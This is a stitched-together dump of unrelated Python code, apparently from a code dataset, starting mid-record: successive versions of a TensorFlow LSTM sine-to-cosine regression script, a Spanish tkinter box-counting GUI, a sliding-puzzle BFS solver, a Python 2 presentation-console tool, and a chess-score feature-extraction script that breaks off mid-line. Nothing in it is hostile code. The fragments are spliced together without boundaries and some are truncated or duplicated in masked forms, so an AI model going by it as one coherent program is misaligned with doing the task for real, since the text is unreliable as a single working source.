sess.run([model.train_op, model.cost, model.\n cell_final_state, model.pred], feed_dict=feed_dict)\n plt.plot(xs[0, :], res[0].flatten(), 'r', xs[0, :], pred.flatten()[\n :TIME_STEPS], 'b--')\n plt.ylim((-1.2, 1.2))\n plt.draw()\n plt.pause(0.3)\n if i % 20 == 0:\n print('cost', round(cost, 4))\n result = sess.run(merged, feed_dict)\n writer.add_summary(result, i)\n",
"step-4": "import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nBATCH_START = 0\nTIME_STEPS = 20\nBATCH_SIZE = 50\nINPUT_SIZE = 1\nOUTPUT_SIZE = 1\nCELL_SIZE = 10\nLR = 0.006\n\n\ndef get_batch():\n global BATCH_START, TIME_STEPS\n xs = np.arange(BATCH_START, BATCH_START + TIME_STEPS * BATCH_SIZE).reshape(\n (BATCH_SIZE, TIME_STEPS)) / (10 * np.pi)\n seq = np.sin(xs)\n res = np.cos(xs)\n BATCH_START += TIME_STEPS\n return [seq[:, :, np.newaxis], res[:, :, np.newaxis], xs]\n\n\nclass LSTMRNN(object):\n\n def __init__(self, n_steps, input_size, output_size, cell_size, batch_size\n ):\n self.n_steps = n_steps\n self.input_size = input_size\n self.output_size = output_size\n self.cell_size = cell_size\n self.batch_size = batch_size\n with tf.name_scope('inputs'):\n self.xs = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='xs')\n self.ys = tf.placeholder(tf.float32, [None, n_steps, input_size\n ], name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(LR).minimize(self.cost)\n\n def add_input_layer(self):\n l_in_x = tf.reshape(self.xs, [-1, self.input_size], name='2_2D')\n Ws_in = self._weight_variable([self.input_size, self.cell_size])\n bs_in = self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y = tf.matmul(l_in_x, Ws_in) + bs_in\n self.l_in_y = tf.reshape(l_in_y, [-1, self.n_steps, self.cell_size],\n name='2_3D')\n\n def add_cell(self):\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(self.cell_size,\n forget_bias=1.0, state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state = lstm_cell.zero_state(self.batch_size,\n dtype=tf.float32)\n self.cell_outputs, self.cell_final_state = tf.nn.dynamic_rnn(lstm_cell,\n self.l_in_y, initial_state=self.cell_init_state, time_major=False)\n\n def add_output_layer(self):\n l_out_x = tf.reshape(self.cell_outputs, [-1, self.cell_size], name=\n '2_2D')\n Ws_out = self._weight_variable([self.cell_size, self.output_size])\n bs_out = self._bias_variable([self.output_size])\n with tf.name_scope('Wx_plus_b'):\n self.pred = tf.matmul(l_out_x, Ws_out) + bs_out\n\n def compute_cost(self):\n losses = tf.contrib.legacy_seq2seq.sequence_loss_by_example([tf.\n reshape(self.pred, [-1], name='reshape_pred')], [tf.reshape(\n self.ys, [-1], name='reshape_target')], [tf.ones([self.\n batch_size * self.n_steps], dtype=tf.float32)],\n average_across_timesteps=True, softmax_loss_function=self.\n ms_error, name='losses')\n with tf.name_scope('average_cost'):\n self.cost = tf.div(tf.reduce_sum(losses, name='losses_sum'),\n self.batch_size, name='average_cost')\n tf.summary.scalar('cost', self.cost)\n\n @staticmethod\n def ms_error(labels, logits):\n return tf.square(tf.subtract(labels, logits))\n\n def _weight_variable(self, shape, name='weights'):\n initializer = tf.random_normal_initializer(mean=0.0, stddev=1.0)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n def _bias_variable(self, shape, name='biases'):\n initializer = tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape, initializer=initializer, name=name)\n\n\nif __name__ == '__main__':\n model = LSTMRNN(TIME_STEPS, INPUT_SIZE, OUTPUT_SIZE, CELL_SIZE, BATCH_SIZE)\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('lstmlogs', sess.graph)\n sess.run(tf.global_variables_initializer())\n plt.ion()\n plt.show()\n for i in range(200):\n seq, res, xs = get_batch()\n if i == 0:\n feed_dict = {model.xs: seq, model.ys: res}\n else:\n feed_dict = {model.xs: seq, model.ys: res, model.\n cell_init_state: state}\n _, cost, state, pred = sess.run([model.train_op, model.cost, model.\n cell_final_state, model.pred], feed_dict=feed_dict)\n plt.plot(xs[0, :], res[0].flatten(), 'r', xs[0, :], pred.flatten()[\n :TIME_STEPS], 'b--')\n plt.ylim((-1.2, 1.2))\n plt.draw()\n plt.pause(0.3)\n if i % 20 == 0:\n print('cost', round(cost, 4))\n result = sess.run(merged, feed_dict)\n writer.add_summary(result, i)\n",
"step-5": "import tensorflow as tf\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nBATCH_START=0\nTIME_STEPS=20\nBATCH_SIZE=50\nINPUT_SIZE=1\nOUTPUT_SIZE=1\nCELL_SIZE=10\nLR=0.006\n\n#generate data\ndef get_batch():\n global BATCH_START,TIME_STEPS\n xs=np.arange(BATCH_START,BATCH_START+TIME_STEPS*BATCH_SIZE).reshape((BATCH_SIZE,TIME_STEPS))/(10*np.pi)\n seq=np.sin(xs)\n res=np.cos(xs)\n #data move one\n BATCH_START+=TIME_STEPS\n # all return shape is (batch_size,time_step,input_size)\n return [seq[:,:,np.newaxis],res[:,:,np.newaxis],xs]\n\n#def RNN LSTM Structure\nclass LSTMRNN(object):\n def __init__(self,n_steps,input_size,output_size,cell_size,batch_size):\n self.n_steps=n_steps\n self.input_size=input_size\n self.output_size=output_size\n self.cell_size=cell_size\n self.batch_size=batch_size\n with tf.name_scope('inputs'):\n self.xs=tf.placeholder(tf.float32,[None,n_steps,input_size],name='xs')\n self.ys=tf.placeholder(tf.float32,[None,n_steps,input_size],name='ys')\n with tf.variable_scope('in_hidden'):\n self.add_input_layer()\n with tf.variable_scope('LSTM_cell'):\n self.add_cell()\n with tf.variable_scope('out_hidden'):\n self.add_output_layer()\n with tf.name_scope('cost'):\n self.compute_cost()\n with tf.name_scope('train'):\n self.train_op=tf.train.AdamOptimizer(LR).minimize(self.cost)\n \n#add input layer\n def add_input_layer(self):\n #shape(batch,step,input)=>(batch*step,input)\n l_in_x=tf.reshape(self.xs,[-1,self.input_size],name='2_2D')\n Ws_in=self._weight_variable([self.input_size,self.cell_size])\n bs_in=self._bias_variable([self.cell_size])\n with tf.name_scope('Wx_plus_b'):\n l_in_y=tf.matmul(l_in_x,Ws_in)+bs_in\n self.l_in_y=tf.reshape(l_in_y,[-1,self.n_steps,self.cell_size],name='2_3D')\n#add cell\n def add_cell(self):\n lstm_cell=tf.contrib.rnn.BasicLSTMCell(self.cell_size,forget_bias=1.0,state_is_tuple=True)\n with tf.name_scope('initial_state'):\n self.cell_init_state=lstm_cell.zero_state(self.batch_size,dtype=tf.float32)\n self.cell_outputs,self.cell_final_state=tf.nn.dynamic_rnn(lstm_cell,self.l_in_y,initial_state=self.cell_init_state,time_major=False)\n#add output layer\n def add_output_layer(self):\n l_out_x=tf.reshape(self.cell_outputs,[-1,self.cell_size],name='2_2D')\n Ws_out=self._weight_variable([self.cell_size,self.output_size])\n bs_out=self._bias_variable([self.output_size,])\n with tf.name_scope('Wx_plus_b'):\n self.pred=tf.matmul(l_out_x,Ws_out)+bs_out\n \n def compute_cost(self):\n losses=tf.contrib.legacy_seq2seq.sequence_loss_by_example(\n [tf.reshape(self.pred,[-1],name='reshape_pred')],\n [tf.reshape(self.ys,[-1],name='reshape_target')],\n [tf.ones([self.batch_size*self.n_steps],dtype=tf.float32)],\n average_across_timesteps=True,\n softmax_loss_function=self.ms_error,\n name='losses'\n )\n with tf.name_scope('average_cost'):\n self.cost=tf.div(\n tf.reduce_sum(losses,name='losses_sum'),\n self.batch_size,\n name='average_cost'\n )\n tf.summary.scalar('cost',self.cost)\n\n @staticmethod\n def ms_error(labels,logits):\n return tf.square(tf.subtract(labels,logits))\n def _weight_variable(self,shape,name='weights'):\n initializer=tf.random_normal_initializer(mean=0.,stddev=1.,)\n return tf.get_variable(shape=shape,initializer=initializer,name=name)\n \n def _bias_variable(self,shape,name='biases'):\n initializer=tf.constant_initializer(0.1)\n return tf.get_variable(shape=shape,initializer=initializer,name=name)\n\n#train\nif __name__=='__main__':\n model=LSTMRNN(TIME_STEPS,INPUT_SIZE,OUTPUT_SIZE,CELL_SIZE,BATCH_SIZE)\n sess=tf.Session()\n #merge for tensorboard\n merged=tf.summary.merge_all()\n writer=tf.summary.FileWriter(\"lstmlogs\",sess.graph)\n sess.run(tf.global_variables_initializer())\n\n #visiable\n plt.ion()\n plt.show()\n\n #train for 200\n for i in range(200):\n seq,res,xs=get_batch()\n if i==0:\n feed_dict={model.xs:seq,model.ys:res,} \n else:\n feed_dict={model.xs:seq,model.ys:res,model.cell_init_state:state}\n #train\n _,cost,state,pred=sess.run([model.train_op,model.cost,model.cell_final_state,model.pred],feed_dict=feed_dict)\n\n\n #plotting\n plt.plot(xs[0,:],res[0].flatten(),'r',xs[0,:],pred.flatten()[:TIME_STEPS],'b--')\n plt.ylim((-1.2,1.2))\n plt.draw()\n plt.pause(0.3)\n\n if i%20==0:\n # 4 \n print('cost',round(cost,4))\n result=sess.run(merged,feed_dict)\n writer.add_summary(result,i)\n\n\n\n\n\n\n\n",
"step-ids": [
8,
11,
12,
13,
14
]
}
|
[
8,
11,
12,
13,
14
] |
from tkinter import *
global P,M,G,en
P=0
M=0
G=0
en=1
def inicio():
global P,M,G,en
B1=Button(ventana,text="CAJAS PEQUEÑAS",command=A,state="normal",bg="yellow").grid(column=1,row=1)
B2=Button(ventana,text="CAJAS MEDIANAS",command=B,state="normal",bg="orange").grid(column=2,row=1)
B3=Button(ventana,text="CAJAS GRANDES",command=C,state="normal",bg="red").grid(column=3,row=1)
B4=Button(ventana,text="TOTAL DE CAJAS",command=D,state="normal",bg="green").grid(column=4,row=1)
def A ():
global P
P=P+1
def B ():
global M
M=M+1
def C ():
global G
G=G+1
def D ():
global P,M,G
l=Label(ventana,text="El total de CAJAS PEQUEÑAS es:"+str(P)).grid(column=0,row=2)
l=Label(ventana,text="El total de CAJAS MEDIANAS es:"+str(M)).grid(column=0,row=3)
l=Label(ventana,text="El total de CAJAS GRANDES es:"+str(G)).grid(column=0,row=4)
l=Label(ventana,text="EL TOTAL DE CAJAS CONTADAS ES:"+str(P+M+G)).grid(column=0,row=5)
if(en==1):
inicio()
ventana=Tk()
inicio()
ventana.mainloop()
|
normal
|
{
"blob_id": "393af07fa7a5c265dbdd3047ef33a77130edf259",
"index": 1915,
"step-1": "<mask token>\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\n<mask token>\n",
"step-2": "<mask token>\nglobal P, M, G, en\n<mask token>\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\n<mask token>\ninicio()\nventana.mainloop()\n",
"step-3": "<mask token>\nglobal P, M, G, en\nP = 0\nM = 0\nG = 0\nen = 1\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\nventana = Tk()\ninicio()\nventana.mainloop()\n",
"step-4": "from tkinter import *\nglobal P, M, G, en\nP = 0\nM = 0\nG = 0\nen = 1\n\n\ndef inicio():\n global P, M, G, en\n B1 = Button(ventana, text='CAJAS PEQUEÑAS', command=A, state='normal',\n bg='yellow').grid(column=1, row=1)\n B2 = Button(ventana, text='CAJAS MEDIANAS', command=B, state='normal',\n bg='orange').grid(column=2, row=1)\n B3 = Button(ventana, text='CAJAS GRANDES', command=C, state='normal',\n bg='red').grid(column=3, row=1)\n B4 = Button(ventana, text='TOTAL DE CAJAS', command=D, state='normal',\n bg='green').grid(column=4, row=1)\n\n\ndef A():\n global P\n P = P + 1\n\n\ndef B():\n global M\n M = M + 1\n\n\ndef C():\n global G\n G = G + 1\n\n\ndef D():\n global P, M, G\n l = Label(ventana, text='El total de CAJAS PEQUEÑAS es:' + str(P)).grid(\n column=0, row=2)\n l = Label(ventana, text='El total de CAJAS MEDIANAS es:' + str(M)).grid(\n column=0, row=3)\n l = Label(ventana, text='El total de CAJAS GRANDES es:' + str(G)).grid(\n column=0, row=4)\n l = Label(ventana, text='EL TOTAL DE CAJAS CONTADAS ES:' + str(P + M + G)\n ).grid(column=0, row=5)\n if en == 1:\n inicio()\n\n\nventana = Tk()\ninicio()\nventana.mainloop()\n",
"step-5": "from tkinter import *\r\nglobal P,M,G,en\r\nP=0\r\nM=0\r\nG=0\r\nen=1\r\ndef inicio():\r\n global P,M,G,en\r\n \r\n B1=Button(ventana,text=\"CAJAS PEQUEÑAS\",command=A,state=\"normal\",bg=\"yellow\").grid(column=1,row=1)\r\n B2=Button(ventana,text=\"CAJAS MEDIANAS\",command=B,state=\"normal\",bg=\"orange\").grid(column=2,row=1)\r\n B3=Button(ventana,text=\"CAJAS GRANDES\",command=C,state=\"normal\",bg=\"red\").grid(column=3,row=1)\r\n B4=Button(ventana,text=\"TOTAL DE CAJAS\",command=D,state=\"normal\",bg=\"green\").grid(column=4,row=1)\r\n \r\n\r\ndef A ():\r\n global P\r\n P=P+1\r\ndef B ():\r\n global M\r\n M=M+1\r\ndef C ():\r\n global G\r\n G=G+1\r\ndef D ():\r\n global P,M,G\r\n l=Label(ventana,text=\"El total de CAJAS PEQUEÑAS es:\"+str(P)).grid(column=0,row=2) \r\n l=Label(ventana,text=\"El total de CAJAS MEDIANAS es:\"+str(M)).grid(column=0,row=3)\r\n l=Label(ventana,text=\"El total de CAJAS GRANDES es:\"+str(G)).grid(column=0,row=4)\r\n l=Label(ventana,text=\"EL TOTAL DE CAJAS CONTADAS ES:\"+str(P+M+G)).grid(column=0,row=5)\r\n\r\n \r\n if(en==1):\r\n inicio()\r\n\r\n \r\nventana=Tk()\r\ninicio()\r\nventana.mainloop()\r\n\r\n\r\n\r\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
from collections import deque
class Solution:
def slidingPuzzle(self, board: List[List[int]]) -> int:
def board2str(board: List[List[int]]) -> str:
return ''.join([str(board[i][j]) for i in range(2) for j in range(3)])
start = board2str(board)
bfs = deque([(start, 0)])
visited = {start}
while bfs:
path, step = bfs.popleft()
if path == "123450": return step
p = path.index("0")
x, y = p // 3, p % 3
path = list(path)
for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:
tx, ty = x + nx, y + ny
if tx < 0 or tx >= 2 or ty < 0 or ty >= 3: continue
path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]
path_str = "".join(path)
if path_str not in visited:
bfs.append((path_str, step + 1))
visited.add(path_str)
path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]
return -1
|
normal
|
{
"blob_id": "dc934f8db4e0c1113e1398b051b58369d909fff8",
"index": 6471,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def slidingPuzzle(self, board: List[List[int]]) ->int:\n\n def board2str(board: List[List[int]]) ->str:\n return ''.join([str(board[i][j]) for i in range(2) for j in\n range(3)])\n start = board2str(board)\n bfs = deque([(start, 0)])\n visited = {start}\n while bfs:\n path, step = bfs.popleft()\n if path == '123450':\n return step\n p = path.index('0')\n x, y = p // 3, p % 3\n path = list(path)\n for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:\n tx, ty = x + nx, y + ny\n if tx < 0 or tx >= 2 or ty < 0 or ty >= 3:\n continue\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n path_str = ''.join(path)\n if path_str not in visited:\n bfs.append((path_str, step + 1))\n visited.add(path_str)\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n return -1\n",
"step-4": "from collections import deque\n\n\nclass Solution:\n\n def slidingPuzzle(self, board: List[List[int]]) ->int:\n\n def board2str(board: List[List[int]]) ->str:\n return ''.join([str(board[i][j]) for i in range(2) for j in\n range(3)])\n start = board2str(board)\n bfs = deque([(start, 0)])\n visited = {start}\n while bfs:\n path, step = bfs.popleft()\n if path == '123450':\n return step\n p = path.index('0')\n x, y = p // 3, p % 3\n path = list(path)\n for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:\n tx, ty = x + nx, y + ny\n if tx < 0 or tx >= 2 or ty < 0 or ty >= 3:\n continue\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n path_str = ''.join(path)\n if path_str not in visited:\n bfs.append((path_str, step + 1))\n visited.add(path_str)\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[\n tx * 3 + ty]\n return -1\n",
"step-5": "from collections import deque\n\n\nclass Solution:\n def slidingPuzzle(self, board: List[List[int]]) -> int:\n def board2str(board: List[List[int]]) -> str:\n return ''.join([str(board[i][j]) for i in range(2) for j in range(3)])\n\n start = board2str(board)\n bfs = deque([(start, 0)])\n visited = {start}\n\n while bfs:\n path, step = bfs.popleft()\n\n if path == \"123450\": return step\n\n p = path.index(\"0\")\n\n x, y = p // 3, p % 3\n\n path = list(path)\n\n for nx, ny in [(0, 1), (1, 0), (0, -1), (-1, 0)]:\n tx, ty = x + nx, y + ny\n\n if tx < 0 or tx >= 2 or ty < 0 or ty >= 3: continue\n\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]\n\n path_str = \"\".join(path)\n if path_str not in visited:\n bfs.append((path_str, step + 1))\n visited.add(path_str)\n\n path[tx * 3 + ty], path[x * 3 + y] = path[x * 3 + y], path[tx * 3 + ty]\n\n return -1\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# presentation console
# - a python interpreter for "pseudo-interative" demos
#
# usage: $ python prescons.py <filename>
#
# <filename> should be a file that contains python code as would be entered
# directly in a terminal - see example.py
#
# while running, press 'space' to move through the code
#
# github.com/inglesp/prescons
from code import InteractiveConsole
from StringIO import StringIO
import sys, termios, tty
# get character from stdin
# based on http://code.activestate.com/recipes/134892/
# *nix only, and doesn't handle arrow keys well
def getch(ch=None):
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
while True:
tty.setraw(fd)
gotch = sys.stdin.read(1)
if ch is None or gotch == ch:
break
if ord(gotch) == 3:
raise KeyboardInterrupt
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
# subclasses InteractiveConsole from code module
class PresentationConsole(InteractiveConsole):
def __init__(self, path):
self.file = open(path)
InteractiveConsole.__init__(self)
def raw_input(self, prompt=''):
self.write(prompt)
if prompt == sys.ps1:
try:
getch(' ')
except KeyboardInterrupt:
print "KeyboardInterrupt"
exec "import ipdb; ipdb.set_trace()" in self.locals
line = self.file.readline()
if len(line) == 0:
self.file.close()
raise EOFError
self.write(line)
return line.rstrip()
def runcode(self, code):
sys.stdout = StringIO()
InteractiveConsole.runcode(self, code)
output = sys.stdout.getvalue()
sys.stdout = sys.__stdout__
if len(output) > 0:
getch(' ')
self.write(output)
if __name__ == '__main__':
path = sys.argv[1]
console = PresentationConsole(path)
console.interact()
|
normal
|
{
"blob_id": "fa531e8b07de6ee3c22146904ee8724cefab9033",
"index": 2732,
"step-1": "# presentation console\n# - a python interpreter for \"pseudo-interative\" demos\n#\n# usage: $ python prescons.py <filename>\n#\n# <filename> should be a file that contains python code as would be entered\n# directly in a terminal - see example.py\n#\n# while running, press 'space' to move through the code\n#\n# github.com/inglesp/prescons\n\nfrom code import InteractiveConsole\nfrom StringIO import StringIO\nimport sys, termios, tty\n\n# get character from stdin\n# based on http://code.activestate.com/recipes/134892/\n# *nix only, and doesn't handle arrow keys well\ndef getch(ch=None):\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n while True:\n tty.setraw(fd)\n gotch = sys.stdin.read(1)\n if ch is None or gotch == ch:\n break\n if ord(gotch) == 3:\n raise KeyboardInterrupt\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n\n# subclasses InteractiveConsole from code module\nclass PresentationConsole(InteractiveConsole):\n def __init__(self, path):\n self.file = open(path)\n InteractiveConsole.__init__(self)\n\n def raw_input(self, prompt=''):\n self.write(prompt)\n if prompt == sys.ps1:\n try:\n getch(' ')\n except KeyboardInterrupt:\n print \"KeyboardInterrupt\"\n exec \"import ipdb; ipdb.set_trace()\" in self.locals\n line = self.file.readline()\n if len(line) == 0:\n self.file.close()\n raise EOFError\n self.write(line)\n return line.rstrip()\n\n def runcode(self, code):\n sys.stdout = StringIO()\n InteractiveConsole.runcode(self, code)\n output = sys.stdout.getvalue()\n sys.stdout = sys.__stdout__\n if len(output) > 0:\n getch(' ')\n self.write(output)\n\nif __name__ == '__main__':\n path = sys.argv[1]\n console = PresentationConsole(path)\n console.interact()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#Script to extract features from chess score data file stockfish.csv
import numpy as np
import pandas as pd
#Load in and format raw chess game scoring data
raw_scores = [line.strip().split(",")[1].split() for line in open("stockfish.csv")][1:]
#Initialize containers for features to extract
game_length = []
average_score = []
score_stdev = []
largest_gain = []
largest_drop = []
max_score = []
min_score = []
ending_score = []
white_avg_improve = []
black_avg_improve = []
white_median_improve = []
black_median_improve = []
white_q1_improve =[]
white_q2_improve =[]
white_q3_improve =[]
white_q4_improve =[]
black_q1_improve =[]
black_q2_improve =[]
black_q3_improve =[]
black_q4_improve =[]
game_score10 = []
game_score20 = []
game_score30 = []
game_score40 = []
game_score50 = []
game_score60 = []
game_score70 = []
game_score80 = []
game_score90 = []
game_score100 = []
white_q1_max =[]
white_q2_max =[]
white_q3_max =[]
white_q4_max =[]
black_q1_max =[]
black_q2_max =[]
black_q3_max =[]
black_q4_max =[]
white_q1_min =[]
white_q2_min =[]
white_q3_min =[]
white_q4_min =[]
black_q1_min =[]
black_q2_min =[]
black_q3_min =[]
black_q4_min =[]
white_q1_stdev =[]
white_q2_stdev =[]
white_q3_stdev =[]
white_q4_stdev =[]
black_q1_stdev =[]
black_q2_stdev =[]
black_q3_stdev =[]
black_q4_stdev =[]
white_5_improve = []
white_10_improve = []
white_15_improve = []
white_20_improve = []
white_25_improve = []
white_30_improve = []
white_35_improve = []
white_40_improve = []
white_45_improve = []
white_50_improve = []
white_55_improve = []
white_60_improve = []
white_65_improve = []
white_70_improve = []
white_75_improve = []
black_5_improve = []
black_10_improve = []
black_15_improve = []
black_20_improve = []
black_25_improve = []
black_30_improve = []
black_35_improve = []
black_40_improve = []
black_45_improve = []
black_50_improve = []
black_55_improve = []
black_60_improve = []
black_65_improve = []
black_70_improve = []
black_75_improve = []
#Loop through game data, calculate and append new features to feature containers
for game in raw_scores:
game_len = len(game)+1 # Add 1 to game length to avoid divide by zero errors caused by empty games
total = 0
prev = None
player = 1
max_so_far = -100
min_so_far = 100
max_drop = 0
max_gain = 0
white_improve = [0]
black_improve = [0]
game_nums = [0]
for score in game:
if score != "NA":
score = int(score)
game_nums.append(score)
total+=score
if prev != None:
change = score - prev
if change < max_drop:
max_drop = change
if change > max_gain:
max_gain = change
if player == 1:
black_improve.append(change)
else:
white_improve.append(change)
player = abs(player-1)
prev = score
if score > max_so_far:
max_so_far = score
if score < min_so_far:
min_so_far = score
#Add computed values to feature containers
white_avg = sum(white_improve)/(game_len/2)
black_avg = sum(black_improve)/(game_len/2)
game_length.append(game_len)
average_score.append(total/game_len)
score_stdev.append(np.std(np.array(game_nums)))
largest_gain.append(max_gain)
largest_drop.append(max_drop)
max_score.append(max_so_far)
min_score.append(min_so_far)
white_avg_improve.append(white_avg)
black_avg_improve.append(black_avg)
white_median_improve.append(sorted(white_improve)[len(white_improve)//2])
black_median_improve.append(sorted(black_improve)[len(black_improve)//2])
white_q1_improve.append( sum(white_improve[0:len(white_improve)//4])/len(white_improve)//4 )
white_q2_improve.append( sum(white_improve[len(white_improve)//4 : (len(white_improve)//4)*2])/len(white_improve)//4 )
white_q3_improve.append( sum(white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3])/len(white_improve)//4 )
white_q4_improve.append( sum(white_improve[(len(white_improve)//4)*3 : ])/len(white_improve)//4 )
black_q1_improve.append( sum(black_improve[0:len(black_improve)//4])/len(black_improve)//4 )
black_q2_improve.append( sum(black_improve[len(black_improve)//4 : (len(black_improve)//4)*2])/len(black_improve)//4 )
black_q3_improve.append( sum(black_improve[(len(black_improve)//4)*2 : (len(black_improve)//4)*3])/len(black_improve)//4 )
black_q4_improve.append( sum(black_improve[(len(black_improve)//4)*3 : ])/len(black_improve)//4 )
white_q1_max.append(max(white_improve[0:1+len(white_improve)//4]))
white_q2_max.append(max(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))
white_q3_max.append(max(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))
white_q4_max.append(max(white_improve[(len(white_improve)//4)*3 : ]))
black_q1_max.append(max(black_improve[0:1+len(black_improve)//4]))
black_q2_max.append(max(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))
black_q3_max.append(max(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))
black_q4_max.append(max(black_improve[(len(black_improve)//4)*3 : ]))
white_q1_min.append(min(white_improve[0:1+len(white_improve)//4]))
white_q2_min.append(min(white_improve[len(white_improve)//4 : 1+(len(white_improve)//4)*2]))
white_q3_min.append(min(white_improve[(len(white_improve)//4)*2 : 1+(len(white_improve)//4)*3]))
white_q4_min.append(min(white_improve[(len(white_improve)//4)*3 : ]))
black_q1_min.append(min(black_improve[0:1+len(black_improve)//4]))
black_q2_min.append(min(black_improve[len(black_improve)//4 : 1+(len(black_improve)//4)*2]))
black_q3_min.append(min(black_improve[(len(black_improve)//4)*2 : 1+(len(black_improve)//4)*3]))
black_q4_min.append(min(black_improve[(len(black_improve)//4)*3 : ]))
white_q1_stdev.append(np.std(np.array((white_improve[0:len(white_improve)//4]))))
white_q2_stdev.append(np.std(np.array((white_improve[len(white_improve)//4 : (len(white_improve)//4)*2]))))
white_q3_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*2 : (len(white_improve)//4)*3]))))
white_q4_stdev.append(np.std(np.array((white_improve[(len(white_improve)//4)*3 : ]))))
black_q1_stdev.append(np.std(np.array((black_improve[0:len(black_improve)//4]))))
